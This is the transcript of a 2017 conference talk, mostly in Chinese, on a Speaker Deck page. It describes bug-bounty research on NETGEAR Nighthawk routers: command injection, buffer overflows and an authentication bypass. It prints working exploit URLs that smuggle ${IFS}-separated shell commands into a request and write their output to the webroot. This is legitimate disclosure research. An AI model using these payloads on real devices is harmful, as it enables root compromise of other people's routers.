Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
NETGEAR Bug Bounty
Search
Lays
May 20, 2017
Research
2
970
NETGEAR Bug Bounty
一個發生在日本的溫馨小故事
Lays
May 20, 2017
Tweet
Share
More Decks by Lays
See All by Lays
ROP 輕鬆談
l4ys
5
1.9k
Other Decks in Research
See All in Research
Time to Cash: The Full Stack Breakdown of Modern ATM Attacks
ratatata
0
150
SSII2025 [TS2] リモートセンシング画像処理の最前線
ssii
PRO
7
3.1k
最適決定木を用いた処方的価格最適化
mickey_kubo
4
1.9k
2025/7/5 応用音響研究会招待講演@北海道大学
takuma_okamoto
1
190
Large Language Model Agent: A Survey on Methodology, Applications and Challenges
shunk031
16
9.9k
スキマバイトサービスにおける現場起点でのデザインアプローチ
yoshioshingyouji
0
230
データxデジタルマップで拓く ミラノ発・地域共創最前線
mapconcierge4agu
0
220
Stealing LUKS Keys via TPM and UUID Spoofing in 10 Minutes - BSides 2025
anykeyshik
0
130
EarthSynth: Generating Informative Earth Observation with Diffusion Models
satai
3
280
EcoWikiRS: Learning Ecological Representation of Satellite Images from Weak Supervision with Species Observation and Wikipedia
satai
3
150
EarthDial: Turning Multi-sensory Earth Observations to Interactive Dialogues
satai
1
120
20250605_新交通システム推進議連_熊本都市圏「車1割削減、渋滞半減、公共交通2倍」から考える地方都市交通政策
trafficbrain
0
780
Featured
See All Featured
Bootstrapping a Software Product
garrettdimon
PRO
307
110k
Scaling GitHub
holman
463
140k
No one is an island. Learnings from fostering a developers community.
thoeni
21
3.4k
BBQ
matthewcrist
89
9.8k
Dealing with People You Can't Stand - Big Design 2015
cassininazir
367
27k
10 Git Anti Patterns You Should be Aware of
lemiorhan
PRO
656
61k
Designing Experiences People Love
moore
142
24k
Designing for Performance
lara
610
69k
[RailsConf 2023] Rails as a piece of cake
palkan
57
5.8k
What's in a price? How to price your products and services
michaelherold
246
12k
Being A Developer After 40
akosma
90
590k
RailsConf 2023
tenderlove
30
1.2k
Transcript
Lays @ HITCON CTF Team / 2017. May
故事是這樣 der
SECCON CTF in Japan 2017 年年初
CTF 就不說了了 ⼤大家都比我懂
⼤大老遠跑來來⽇日本 好像該做點有意義的事
於是我們買了了⽜牛排來來煎。
飽暖思淫慾 難得⼤大家都在⽇日本 有⼈人提議 ⼀一起來來挖洞洞洞洞(?)吧
組隊玩 Bug Bounty 或許可以有些新思路路
NETGEAR on bugcrowd
None
None
Target 1 Nighthawk X4S
First Try • Download Firmware • binwalk to extract squash
filesystem • Grab some cgi from /www to feed • Pwn it and profit !
First Try • Download Firmware • binwalk to extract squash
filesystem • Grab some cgi from /www to feed • Pwn it and profit !
Preauth CGIs? Only two are real cgi …
RMT_invite.cgi It calls another binary: proccgi … and It’s open
sourced !
proccgi from 1997 A bigger attack surface? we just got
nothing…
Second Try • the HTTP Server • Pwn it and
profit !
/usr/sbin/uhttpd • It’s open sourced too ! • Call net-cgi
to process cgi requests
/usr/sbin/net-cgi ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV),
dynamically linked Only NX enabled
/usr/sbin/net-cgi ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV),
dynamically linked Only NX enabled
/usr/sbin/net-cgi ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV),
dynamically linked Only NX enabled
/usr/sbin/net-cgi ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV),
dynamically linked Only NX enabled
/usr/sbin/net-cgi ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV),
dynamically linked Only NX enabled
/usr/sbin/net-cgi • Found a command injection ! • device_uuid is
created from User-Agent and IP Address
/usr/sbin/net-cgi • Found a command injection ! • But it’s
also filtered out… • Only alphanumeric allowed
/usr/sbin/net-cgi • Found another buffer overflow ! • Keep reading
until space / tab / new line • But it’s just an overflow on global variable …
/usr/sbin/net-cgi • Exploit chain ! • Overwrite device_uuid in .bss
after filtered
/usr/sbin/net-cgi • So now command injection works • No space
/ tab available? use ${IFS} http://[ip]/FW_log.htm?/ %20timestamp=[A*504];sleep${IFS}10;
But how do we test our exploit…?
PChome 24h ! but we’re in Japan…
None
Exploit • Write to stdout didn’t work : ( •
Write output to a file and copy it to webroot • Access the output file curl http://[ip]/FW_log.htm?%20timestamp= [A * 504];[cmd]|tee${IFS}/www/out.js;
Report • NETGEAR told me it’s duplicated after 2 weeks
(╯‵□′)╯︵ ┴─┴
Target 2 Nighthawk X8 (比我們在⽇日本煎的⽜牛排還貴)
Nighthawk X8 • Nothing interesting in cgi files too •
Different HTTP Server from X4S • Most of cgi requests handled by httpd
/usr/sbin/httpd ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV),
dynamically linked Only NX enabled
/usr/sbin/httpd • It’s boring on plane … so I
found a stack overflow • A strcpy from QUERY_STRING • How do we get here?
Stack overflow • Triggered if url starts with /shares •
But we could only access /shares from LAN
Stack overflow • Triggered if url starts with /shares •
But we could only access /shares from LAN … really ?
Stack overflow • The check is only strncmp with
“GET /shares” • Bypass by sending “HEAD /shares” or something like “XXXX /shares”
Stack overflow • So now we can crash the HTTP
Server • Let’s try to control PC !
Control the PC • No url decode • curl /
requests doesn’t support unprintable url • But it’s https … • Send raw https requests
But how do I test my exploit…? Can I have
a debug environment ?
Debug • There’re no ssh / telnet features … •
We need other ways to debug !
So I found another command injection • device_name in lan.cgi
handler
So I found another command injection • device_name in lan.cgi
handler
Now let’s see if we’ve controlled the PC • dmesg
doesn’t work : ( • Found some useful gadgets system(“echo Kernel crash >> /tmp/info.txt”) • Read /tmp/info.txt to check if PC controlled
Now we controlled the PC But where to jump …
?
Exploit • Stack overflow caused by strcpy • We can
only use one gadget • It’s not CTF, system(“/bin/sh”) doesn’t work • We need some magic gadgets !
So I and found this : acosNvramConfig_set(“http_passwd”, “”); acosNvramConfig_save(); •
So we can set the login password to empty !
After server restarted, we can login without auth
Exploit • Combined above 2 bugs • We can bypass
auth and execute command with root privilege !
Report • Got $1500 bounty after 2 months ヽ(✿゚▽゚)ノ
Conclusion • 貴的產品不⼀一定安全 • Bug Bounty 對於提升產品安全還是挺有幫助的 • 簡單的洞洞⼈人⼈人能挖,越猥瑣的思路路越不容易易撞 •
有看有機會,⼤大家沒事就⼀一起來來挖挖吧